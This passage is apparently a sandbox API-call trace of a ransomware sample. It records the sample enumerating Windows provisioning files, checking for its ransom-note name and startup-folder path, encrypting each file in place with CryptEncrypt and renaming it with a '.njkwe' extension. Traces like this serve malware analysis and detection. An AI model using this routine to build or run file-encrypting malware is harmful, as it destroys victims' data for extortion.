returned 1 [0076.534] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.534] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.534] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.534] CloseHandle (hObject=0x43c) returned 1 [0076.534] GetProcessHeap () returned 0xbe0000 [0076.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.534] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 191 [0076.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\120__connections_cellular_vodafone fo (faroe islands)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\120__connections_cellular_vodafone fo (faroe islands)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.535] GetProcessHeap () returned 0xbe0000 [0076.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.535] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904f6aa1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904f6aa1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904f6aa1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", cAlternateFileName="121__C~1.PRO")) returned 1 [0076.535] lstrcmpiW (lpString1="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.535] lstrcmpiW (lpString1="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.535] lstrcmpiW (lpString1="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.535] lstrcmpiW (lpString1="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.535] lstrcmpiW (lpString1="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.535] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml") returned 158 [0076.535] StrStrIW (lpFirst="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.535] lstrcmpW (lpString1="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.535] lstrcmpW (lpString1="121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.535] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\121__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\121__connections_cellular_kidanet (fiji)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.535] GetTickCount () returned 0x1153797 [0076.536] GetTickCount () returned 0x1153797 [0076.536] GetTickCount () returned 0x1153797 [0076.536] GetTickCount () returned 0x1153797 [0076.536] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.536] GetProcessHeap () returned 0xbe0000 [0076.536] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.536] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0076.537] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.537] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0076.537] GetProcessHeap () returned 0xbe0000 [0076.537] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.538] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.538] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.538] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.538] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.538] CloseHandle (hObject=0x43c) returned 1 [0076.538] GetProcessHeap () returned 0xbe0000 [0076.538] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.538] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0076.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\121__connections_cellular_kidanet (fiji)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\121__Connections_Cellular_Kidanet (Fiji)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\121__connections_cellular_kidanet (fiji)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.539] GetProcessHeap () returned 0xbe0000 [0076.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.539] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904f6aa1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904f6aa1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904f6aa1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", cAlternateFileName="122__C~1.PRO")) returned 1 [0076.539] lstrcmpiW (lpString1="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.539] lstrcmpiW (lpString1="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.539] lstrcmpiW (lpString1="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.539] lstrcmpiW (lpString1="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.539] lstrcmpiW (lpString1="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.539] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml") returned 164 [0076.539] StrStrIW (lpFirst="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.539] lstrcmpW (lpString1="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.539] lstrcmpW (lpString1="122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.539] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\122__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.539] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\122__connections_cellular_vodafone fiji (fiji)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.539] GetTickCount () returned 0x1153797 [0076.539] GetTickCount () returned 0x1153797 [0076.539] GetTickCount () returned 0x1153797 [0076.539] GetTickCount () returned 0x1153797 [0076.539] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.540] GetProcessHeap () returned 0xbe0000 [0076.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.540] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0076.542] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.542] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0076.542] GetProcessHeap () returned 0xbe0000 [0076.542] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.542] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.542] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.542] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.542] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.543] CloseHandle (hObject=0x43c) returned 1 [0076.543] GetProcessHeap () returned 0xbe0000 [0076.543] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.543] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0076.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\122__connections_cellular_vodafone fiji (fiji)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\122__Connections_Cellular_Vodafone Fiji (Fiji)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\122__connections_cellular_vodafone fiji (fiji)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.543] GetProcessHeap () returned 0xbe0000 [0076.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.543] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904f6aa1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904f6aa1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904f6aa1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", cAlternateFileName="123__C~1.PRO")) returned 1 [0076.543] lstrcmpiW (lpString1="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.544] lstrcmpiW (lpString1="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.544] lstrcmpiW (lpString1="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.544] lstrcmpiW (lpString1="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.544] lstrcmpiW (lpString1="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.544] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml") returned 164 [0076.544] StrStrIW (lpFirst="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.544] lstrcmpW (lpString1="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.544] lstrcmpW (lpString1="123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.544] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\123__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\123__connections_cellular_vodafone fiji (fiji)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.545] GetTickCount () returned 0x1153797 [0076.545] GetTickCount () returned 0x1153797 [0076.545] GetTickCount () returned 0x1153797 [0076.545] GetTickCount () returned 0x1153797 [0076.545] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.545] GetProcessHeap () returned 0xbe0000 [0076.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.545] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0076.547] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.547] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0076.547] GetProcessHeap () returned 0xbe0000 [0076.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.547] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.547] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.547] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.547] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.547] CloseHandle (hObject=0x43c) returned 1 [0076.548] GetProcessHeap () returned 0xbe0000 [0076.548] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.548] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0076.548] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\123__connections_cellular_vodafone fiji (fiji)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\123__Connections_Cellular_Vodafone Fiji (Fiji)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\123__connections_cellular_vodafone fiji (fiji)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.548] GetProcessHeap () returned 0xbe0000 [0076.548] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.548] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904f6aa1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904f6aa1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904f6aa1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="124__C~1.PRO")) returned 1 [0076.548] lstrcmpiW (lpString1="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.548] lstrcmpiW (lpString1="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.548] lstrcmpiW (lpString1="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0076.548] lstrcmpiW (lpString1="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.548] lstrcmpiW (lpString1="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.549] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.549] StrStrIW (lpFirst="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.549] lstrcmpW (lpString1="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.549] lstrcmpW (lpString1="124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.549] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\124__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.549] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\124__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.549] GetTickCount () returned 0x11537a6 [0076.549] GetTickCount () returned 0x11537a6 [0076.549] GetTickCount () returned 0x11537a6 [0076.549] GetTickCount () returned 0x11537a6 [0076.549] 